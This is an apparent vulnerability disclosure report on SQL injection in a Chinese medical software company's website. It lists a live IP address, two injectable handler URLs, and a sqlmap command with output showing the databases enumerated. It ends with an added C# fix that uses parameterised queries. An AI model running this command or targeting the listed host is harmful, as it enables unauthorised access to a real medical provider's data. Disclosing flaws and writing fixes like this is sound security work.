Multiple SQL injection vulnerabilities on the Ruiming Medical main site cause sensitive information leakage
RT
Chengdu Ruiming Medical Information Technology Co., Ltd. is a high-tech enterprise dedicated to researching, developing, producing and selling PACS/RIS/HIS medical imaging information system products in the medical information field. The company's main R&D personnel have a profound medical imaging research background and strong technical accumulation; its early major technical reserves in medical image processing, 3D reconstruction, breast CAD, pulmonary nodule detection and other computer-aided diagnosis are ......
http://123.56.113.223:8081/Handler/Imple.ashx?pageIndex=1&type=Imple&Id=134
python sqlmap.py -u "http://123.56.113.223:8081/Handler/Imple.ashx?pageIndex=1&type=Imple&Id=134" -p Id --dbs
available databases [9]:
[*] master
[*] model
[*] msdb
[*] newMedicinePlatform
[*] ReportServer
[*] ReportServerTempDB
[*] RMFitness
[*] RmmitData
[*] tempdb
[19:53:53] [INFO] fetching current database
current database: 'RmmitData'
[19:53:53] [INFO] testing if current user is DBA
current user is DBA: False
[19:53:53] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times
[19:53:53] [INFO] fetched data logged to text files under '/Users/Apple/.sqlmap/output/123.56.113.223'
http://123.56.113.223:8081/Handler/Paging.ashx?pageIndex=1&type=Working&d=73
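
A server-side fix for handlers such as the two listed above, as an added example that is not part of the original report or the vendor's code: the numeric parameter is parsed as an integer and bound as a typed parameter, and type is resolved through an allow-list. The class name, table and column names, and the connection-string name are assumptions; only the query-string names Id and type come from the URLs above.

```csharp
// Added example: hardened sketch of an .ashx handler. Table, column and
// connection-string names are hypothetical; only the query-string
// parameter names (type, Id) come from the report.
using System;
using System.Collections.Generic;
using System.Configuration;
using System.Data;
using System.Data.SqlClient;
using System.Web;

public class ImpleHandler : IHttpHandler
{
    // "type" selects a table, and identifiers cannot be bound as SQL
    // parameters, so map it to fixed names instead of concatenating input.
    private static readonly Dictionary<string, string> Tables =
        new Dictionary<string, string>(StringComparer.Ordinal)
        {
            { "Imple", "dbo.Imple" },      // hypothetical table names
            { "Working", "dbo.Working" }
        };

    public bool IsReusable { get { return true; } }

    public void ProcessRequest(HttpContext context)
    {
        var q = context.Request.QueryString;
        int id;
        string table;
        // Reject non-integer ids and unknown types with a 400 instead of
        // letting a malformed query surface as an HTTP 500.
        if (!int.TryParse(q["Id"], out id) || id < 1 ||
            q["type"] == null || !Tables.TryGetValue(q["type"], out table))
        {
            context.Response.StatusCode = 400;
            return;
        }
        string cs = ConfigurationManager.ConnectionStrings["Site"].ConnectionString;
        using (var conn = new SqlConnection(cs))
        using (var cmd = new SqlCommand(
            "SELECT Title FROM " + table + " WHERE Id = @id", conn))
        {
            // The id travels as a typed parameter, never as SQL text.
            cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;
            conn.Open();
            object title = cmd.ExecuteScalar();
            context.Response.ContentType = "text/plain";
            context.Response.Write(Convert.ToString(title));
        }
    }
}
```

Other integer parameters, such as pageIndex, would be parsed and bound the same way as Id.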